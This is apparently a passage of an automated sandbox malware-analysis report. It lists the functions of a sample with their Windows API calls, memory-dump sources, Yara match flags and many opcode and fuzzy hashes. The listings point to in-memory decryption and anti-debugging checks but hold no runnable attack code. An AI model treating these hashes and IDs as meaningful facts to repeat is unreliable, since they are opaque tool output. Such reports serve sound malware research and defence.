                                                  • Opcode Fuzzy Hash: b1bb3170cdd3b3b7e9b4ca1deb2ba2477b74081c4fdbbab59794a4f8b52866f6
                                                  • Instruction Fuzzy Hash: 2FF08C3264510EEFCB14CF25C981BDEBBA6FF90750F24801AE84197E64C7B66D218F48
                                                  Function 00A92E79 Relevance: 1.5, APIs: 1, Instructions: 23memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VirtualProtect.KERNEL32(?), ref: 00A92E91
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597807409.0000000000A92000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A92000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_a92000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  • Opcode ID: c59b2d0b83b12de316770ed8b9581ea0d51ace4a58cf25cd7806cb15108c5049
                                                  • Instruction ID: e42d706e8158039aed7543a4679fd14072b68e9e789745bae1a7dd9e833729d9
                                                  • Opcode Fuzzy Hash: c59b2d0b83b12de316770ed8b9581ea0d51ace4a58cf25cd7806cb15108c5049
                                                  • Instruction Fuzzy Hash: C1F0393264410FABDB04CF15C951BDEB7A2EFE5B10F24811AE84497E54C7BA6D218F48
                                                  Function 0040E268 Relevance: 1.5, APIs: 1, Instructions: 11COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 0040E27B
                                                    • Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
                                                    • Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: ErrorFreeHeapLast_free
                                                  • String ID:
                                                  • API String ID: 1353095263-0
                                                  • Opcode ID: db01065975d67949ddfc68d95b64cc0fb921476d903cbe9e9cdf5676f9f73183
                                                  • Instruction ID: def2e2de252ffdbb94672f6279d5865abf5ab7644d9ffbe49541578f7e328dd5
                                                  • Opcode Fuzzy Hash: db01065975d67949ddfc68d95b64cc0fb921476d903cbe9e9cdf5676f9f73183
                                                  • Instruction Fuzzy Hash: 82C08C31100208BBCB00DB46C806B8E7FA8DB803A8F204049F40417251DAB1EE409680
                                                  Function 10005BF4 Relevance: 1.5, APIs: 1, Instructions: 11COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 10005C07
                                                    • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                                    • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: ErrorFreeHeapLast_free
                                                  • String ID:
                                                  • API String ID: 1353095263-0
                                                  • Opcode ID: d102fdbbc19008656020672b0513dbd0600b00c460041e1c03a0ef10da910664
                                                  • Instruction ID: c87f8b0a48b83a8a7248450826a19003e4aa18d6d81e39a7cffe4d34c565a0dd
                                                  • Opcode Fuzzy Hash: d102fdbbc19008656020672b0513dbd0600b00c460041e1c03a0ef10da910664
                                                  • Instruction Fuzzy Hash: D9C04C75500208BBDB05DF45DD06A4E7BA9EB812A4F204054F41567291DAB5EF449691
                                                  Function 00DAA11D Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00DAA16E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598451673.0000000000DA9000.00000040.00000020.00020000.00000000.sdmp, Offset: 00DA9000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_da9000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                  • Instruction ID: 43d50efa79434ada3ec36ce39fa49bfe189bff492070d7ded440eadf758d3750
                                                  • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                  • Instruction Fuzzy Hash: 57112B79A00208EFDB01DF98C985E98BBF5EF08350F058094F9489B362D371EA50DF91
                                                  Function 00402BF0 Relevance: 1.3, APIs: 1, Instructions: 9memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VirtualAlloc.KERNEL32(?,?,?,?), ref: 00402BFF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: ca1f9d2fe36c7284753979306af93d0cb1d2fe33a661f06d3f51028e1cfc8f97
                                                  • Instruction ID: c3e6f36c677934e3fb1d6ceeea9da9d01375f90aa72a3d22a0593b590ebbe711
                                                  • Opcode Fuzzy Hash: ca1f9d2fe36c7284753979306af93d0cb1d2fe33a661f06d3f51028e1cfc8f97
                                                  • Instruction Fuzzy Hash: F7C0013200020DFBCF025F81EC0489A7F2AEB09264F008020FA1804021C7329931ABA9
                                                  Function 00402C10 Relevance: 1.3, APIs: 1, Instructions: 8COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VirtualFree.KERNELBASE(?,?,?), ref: 00402C1C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: FreeVirtual
                                                  • String ID:
                                                  • API String ID: 1263568516-0
                                                  • Opcode ID: 5ceef4664e2463bb707098a5d0699c231cbc0156091deadbe1fb1452187b7f9f
                                                  • Instruction ID: 60d78a83612f02709208ad56537e98f16bf966ab6139b9664c308e167d28ca00
                                                  • Opcode Fuzzy Hash: 5ceef4664e2463bb707098a5d0699c231cbc0156091deadbe1fb1452187b7f9f
                                                  • Instruction Fuzzy Hash: 61B0923244020CFBCF021F81EC048D93F2AFB08264F008024FA1C44031C733D531AB84

                                                  Non-executed Functions

                                                  Function 00E93B27 Relevance: 31.4, APIs: 9, Strings: 8, Instructions: 1645COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: DFEK$FOKD$]DFE$rB$rB$rB$rB$rB
                                                  • API String ID: 0-735762442
                                                  • Opcode ID: b634da6b4ff11c5db356e861f82a2c18836c59c7cb790a52b1b2f21f6beabc7d
                                                  • Instruction ID: d1863f09282db01cbe0ff39ae2376dbc37c2793cc856e5adc78d2d40b937d76c
                                                  • Opcode Fuzzy Hash: b634da6b4ff11c5db356e861f82a2c18836c59c7cb790a52b1b2f21f6beabc7d
                                                  • Instruction Fuzzy Hash: C7E2CCB1D002589BDF24EB64CC55BEDBBB4AF11304F1091E8E5193B292EB755E88CFA1
                                                  Function 00E93727 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 225encryptionCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,0042A018), ref: 00E937A7
                                                  • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 00E937CB
                                                  • _mbstowcs.LIBCMT ref: 00E9381E
                                                  • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 00E93835
                                                  • GetLastError.KERNEL32 ref: 00E9383F
                                                  • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 00E93867
                                                  • GetLastError.KERNEL32 ref: 00E93871
                                                  • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00E93881
                                                  • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 00E93943
                                                  • CryptDestroyKey.ADVAPI32(?), ref: 00E939B5
                                                  Strings
                                                  • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 00E93783
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease_mbstowcs
                                                  • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                                                  • API String ID: 3642901890-63410773
                                                  • Opcode ID: e8a2417c6fd1f5a0234f20e664ae74c119de5196ead524865740bbc4210dc3f9
                                                  • Instruction ID: 3452a092e556f1c4f6ccd2307f260534ba018518fa67281792fd7d46d7c7c72e
                                                  • Opcode Fuzzy Hash: e8a2417c6fd1f5a0234f20e664ae74c119de5196ead524865740bbc4210dc3f9
                                                  • Instruction Fuzzy Hash: 5B819E71A00218AFEF249F24CC45B9ABBB6FF89304F1481A9F54DE7291DB719E848F51
                                                  Function 0097AFAE Relevance: 13.0, Strings: 9, Instructions: 1745COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597807409.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_819000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: '^zi$0+t?$2__$4s^$8~{$Q4]~$~?}$lXg$zW
                                                  • API String ID: 0-100829803
                                                  • Opcode ID: fb7ffd4ca24e343ab64b6082d29e30b772fb6729577879d6899b1c3df115e5f0
                                                  • Instruction ID: 94f60cd853afc27696a7966e3d3a03b4bd0bcdd3447823f0e400c39ff9d168a0
                                                  • Opcode Fuzzy Hash: fb7ffd4ca24e343ab64b6082d29e30b772fb6729577879d6899b1c3df115e5f0
                                                  • Instruction Fuzzy Hash: 3DB24BF360C2049FE304AE2DEC8567AF7E9EF94720F16863DE6C5C7744EA3598018696
                                                  Function 004188AA Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1451COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: __floor_pentium4
                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                  • API String ID: 4168288129-2761157908
                                                  • Opcode ID: 14c724df0906a7543d709f4d96d1b8b7f4ee31c8485c5baae612bd997d7771c3
                                                  • Instruction ID: d7ffb76180c9728a397d1ccf0e686cee7d0516322be8d88619d78ced8c4d9a03
                                                  • Opcode Fuzzy Hash: 14c724df0906a7543d709f4d96d1b8b7f4ee31c8485c5baae612bd997d7771c3
                                                  • Instruction Fuzzy Hash: F1C22A72E042288FDB25CE28DD507EAB3B5EB49314F1441ABD84DE7280E779AEC58F45
                                                  Function 0097E5BC Relevance: 9.2, Strings: 6, Instructions: 1657COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597807409.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_819000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: "Mk}$*p^}$0mw$RHy$b#_$k6W
                                                  • API String ID: 0-91852522
                                                  • Opcode ID: dbb8559a49791cf60e391eea520ab7c998fb8d6b0e976bb39c991125ca78eb47
                                                  • Instruction ID: 2b7d37b26d7dcc2bc5a991f1b002fb6cd5f2ab6afd87c60e4828fbff17cac669
                                                  • Opcode Fuzzy Hash: dbb8559a49791cf60e391eea520ab7c998fb8d6b0e976bb39c991125ca78eb47
                                                  • Instruction Fuzzy Hash: D2B217F360C2149FE3186E2DEC4567ABBE9EFD4720F1A493DEAC5C3344EA3558018696
                                                  Function 00981B8D Relevance: 9.0, Strings: 6, Instructions: 1542COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597807409.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_819000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 5xO}$5w,$o5-$ox?V$pL+$}+%
                                                  • API String ID: 0-4273804182
                                                  • Opcode ID: fc37c7d36d54af61c5400a31bb3dfa6b313519c3566e3e9a0693f47d7c6c4d5f
                                                  • Instruction ID: 634229da632cbd8d7710c1d1690e5316186c16d0a374b974963fda193797ab75
                                                  • Opcode Fuzzy Hash: fc37c7d36d54af61c5400a31bb3dfa6b313519c3566e3e9a0693f47d7c6c4d5f
                                                  • Instruction Fuzzy Hash: 91B2E6F360C6009FE304AE29EC8577ABBE5EF94720F1A893DE6C4C7744E63598058697
                                                  Function 004097B2 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004097BE
                                                  • IsDebuggerPresent.KERNEL32 ref: 0040988A
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004098AA
                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 004098B4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                  • String ID:
                                                  • API String ID: 254469556-0
                                                  • Opcode ID: 3d6f7e7e6d2dce829ef9a538eb3787554eded577627c7bcf21dfb5f8b50c02c3
                                                  • Instruction ID: c565fb8366faf90fb764b1371249259a4a166a2e914fc73a985bf40890c2a5d7
                                                  • Opcode Fuzzy Hash: 3d6f7e7e6d2dce829ef9a538eb3787554eded577627c7bcf21dfb5f8b50c02c3
                                                  • Instruction Fuzzy Hash: AB312BB5D1131CDBDB10EF65D9897CDBBB8BF18304F1040AAE409A7290EB755A85CF49
                                                  Function 00E99A19 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00E99A25
                                                  • IsDebuggerPresent.KERNEL32 ref: 00E99AF1
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00E99B11
                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 00E99B1B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                  • String ID:
                                                  • API String ID: 254469556-0
                                                  • Opcode ID: 3d6f7e7e6d2dce829ef9a538eb3787554eded577627c7bcf21dfb5f8b50c02c3
                                                  • Instruction ID: 86bb0408f35eb59dad6398aea974873926d39d3cc26e969f03e35c2c8536436d
                                                  • Opcode Fuzzy Hash: 3d6f7e7e6d2dce829ef9a538eb3787554eded577627c7bcf21dfb5f8b50c02c3
                                                  • Instruction Fuzzy Hash: 6931FBB5D0521C9BDF10DF64D98A7CCBBF8BF08304F1041AAE409AB250EB755A85CF45
                                                  Function 10002FDA Relevance: 6.1, APIs: 4, Instructions: 73COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 10002FE6
                                                  • IsDebuggerPresent.KERNEL32 ref: 100030B2
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 100030D2
                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 100030DC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                  • String ID:
                                                  • API String ID: 254469556-0
                                                  • Opcode ID: fd06b871e9cf82683454e3fbfac267bd1ef2951c7b429272aa340f07bdb4f9c2
                                                  • Instruction ID: 336d1356b37294b5c1fe5cc3e7a5e53ac0bdfc53d52c9a9f50db52ddd632742b
                                                  • Opcode Fuzzy Hash: fd06b871e9cf82683454e3fbfac267bd1ef2951c7b429272aa340f07bdb4f9c2
                                                  • Instruction Fuzzy Hash: B6312B75D45269DBEB21DF64C989BCDBBF8EF08340F1081AAE40DA7250EB719A85CF04
                                                  Function 009793DA Relevance: 5.5, Strings: 3, Instructions: 1753COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597807409.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_819000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ${E{$2scj$NQR+
                                                  • API String ID: 0-1557650278
                                                  • Opcode ID: 34269b8d84c25f339fe8aa12371750012b62bb368d3a229aa1bff1bd441eba24
                                                  • Instruction ID: ac18ecc241f064977a3f8cd79db15260bbc38580d521e0e2c8d9aff29945ac9c
                                                  • Opcode Fuzzy Hash: 34269b8d84c25f339fe8aa12371750012b62bb368d3a229aa1bff1bd441eba24
                                                  • Instruction Fuzzy Hash: D0B25BF3A0C6049FE304AE2DEC8567BBBD9EBD4320F1A463DEAC5C3744E93558058696
                                                  Function 009835E6 Relevance: 5.4, Strings: 3, Instructions: 1624COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597807409.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_819000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @[y$ZZ$qWo
                                                  • API String ID: 0-580805910
                                                  • Opcode ID: e18fe93c86dd0153b583c102a7d53e0d0055cb5f070b5fc3b77a1f9695c89461
                                                  • Instruction ID: 384587c0dbf66fa338303a060e6f7be04117d2031153a8d2b2174b512d27f503
                                                  • Opcode Fuzzy Hash: e18fe93c86dd0153b583c102a7d53e0d0055cb5f070b5fc3b77a1f9695c89461
                                                  • Instruction Fuzzy Hash: 18B2F6F3A082109FE304AE2DDC8566AFBE5EFD4720F1A853DE6C5C3744EA3558058697
                                                  Function 0098D6EF Relevance: 5.3, Strings: 3, Instructions: 1566COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597807409.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_819000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: `*8$s=oc$sJ
                                                  • API String ID: 0-3388830950
                                                  • Opcode ID: 0dfc94e8ed56e96cf5a624b309a2c86ab723844e7fbb032d3ed394a51aef5691
                                                  • Instruction ID: 531c0828b46b8c01d0aea104d13413f5a23948ccb77b85c7c802f1c2da19d73c
                                                  • Opcode Fuzzy Hash: 0dfc94e8ed56e96cf5a624b309a2c86ab723844e7fbb032d3ed394a51aef5691
                                                  • Instruction Fuzzy Hash: EFB2E5F36082049FE3046E2DEC8577ABBE9EF94720F1A493DEAC5C3744EA3558448697
                                                  Function 0098025F Relevance: 5.3, Strings: 3, Instructions: 1512COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597807409.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_819000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: )]$/Z3$cDzk
                                                  • API String ID: 0-1976457530
                                                  • Opcode ID: a69669357c36a94ad8956e7768cafa19df9ce3497208010cdfd24ce1ad9acc11
                                                  • Instruction ID: 55c866a588ad198b362b1f5d1a442cf827e932395bb5a0c283b02284dc857279
                                                  • Opcode Fuzzy Hash: a69669357c36a94ad8956e7768cafa19df9ce3497208010cdfd24ce1ad9acc11
                                                  • Instruction Fuzzy Hash: A8A24BF360C2109FE304AE2DEC8567ABBE5EFD4720F1A863DE6C4D3744EA3558058696
                                                  Function 0040C0B3 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0040C1AB
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0040C1B5
                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0040C1C2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                  • String ID:
                                                  • API String ID: 3906539128-0
                                                  • Opcode ID: b149471185ea7cab19788dd3e2c66aa1f526c3a9366d234e05bd43495572b69a
                                                  • Instruction ID: dd4c83c30a1d2e7c36c102c60c461113305a32f1f02fbca7a201bc05c8f10de1
                                                  • Opcode Fuzzy Hash: b149471185ea7cab19788dd3e2c66aa1f526c3a9366d234e05bd43495572b69a
                                                  • Instruction Fuzzy Hash: 3031E774901228EBCB21DF65D8897CDBBB4BF18310F5041EAE40CA7291E7349F858F49
                                                  Function 00E9C31A Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00E9C412
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00E9C41C
                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00E9C429
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                  • String ID:
                                                  • API String ID: 3906539128-0
                                                  • Opcode ID: 131c0d4e7d26b594cba5fcb71e5b1937b03cc24f2ec617643b077344ff1b42c4
                                                  • Instruction ID: 6780126a4ba03a93db9a014d08b1f6715943f48b859779444168ba88d26828ff
                                                  • Opcode Fuzzy Hash: 131c0d4e7d26b594cba5fcb71e5b1937b03cc24f2ec617643b077344ff1b42c4
                                                  • Instruction Fuzzy Hash: A931B4749012289BCF21DF28D9897DCBBF4BF08314F6051EAE41CA7251E7709B858F49
                                                  Function 100056A0 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 10005798
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 100057A2
                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 100057AF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                  • String ID:
                                                  • API String ID: 3906539128-0
                                                  • Opcode ID: ce89a4acebe00847e0bf7db2b2a5c1550e22667e6ae7b5dc377587a900902601
                                                  • Instruction ID: 5682311db8f2ea5b7fb0b10b77ab1de1cec722dcfd082a676ba882e0b3775376
                                                  • Opcode Fuzzy Hash: ce89a4acebe00847e0bf7db2b2a5c1550e22667e6ae7b5dc377587a900902601
                                                  • Instruction Fuzzy Hash: 4B31D3749012299BDB62DF24DD89B8DBBB8EF08750F5081EAE41CA7250EB709F858F44
                                                  Function 00E9F174 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(?,?,00E9F173,00000000,0041D0A0,?,00000000,?,00EA1714), ref: 00E9F196
                                                  • TerminateProcess.KERNEL32(00000000,?,00E9F173,00000000,0041D0A0,?,00000000,?,00EA1714), ref: 00E9F19D
                                                  • ExitProcess.KERNEL32 ref: 00E9F1AF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CurrentExitTerminate
                                                  • String ID:
                                                  • API String ID: 1703294689-0
                                                  • Opcode ID: 0681eec8a10bae1972cdd76b7596642c5d6b23a8fea5b51096d6af8d336d3898
                                                  • Instruction ID: c64bfdc4ca6b76c57936d17e0f743b43cb82f0437c2a95b7cd715cb5c4598cfa
                                                  • Opcode Fuzzy Hash: 0681eec8a10bae1972cdd76b7596642c5d6b23a8fea5b51096d6af8d336d3898
                                                  • Instruction Fuzzy Hash: 84E0B671445118FFCF117B65DD49A893B69FF54386F005424F805DA232CB7AED81CB84
